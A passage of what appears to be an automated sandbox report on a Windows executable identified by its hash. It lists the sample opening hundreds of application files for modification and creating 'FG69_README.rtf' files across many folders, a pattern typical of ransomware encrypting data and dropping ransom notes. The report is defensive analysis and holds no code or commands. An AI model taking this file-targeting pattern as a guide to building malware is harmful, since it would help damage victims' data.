Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\el.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Graph.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Oral d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Asuncion d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Journal.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javaws.policy d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\rt.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Samarkand d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\bin\server\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Synchronization.rll d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Phoenix d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Christmas d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogo.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{C2992E49-2AEA-49C3-A145-FACF92F54BB3}\84.0.4147.89_chrome_installer.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ja.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5EDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\SendDisable.xla d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-1 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Madeira d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin 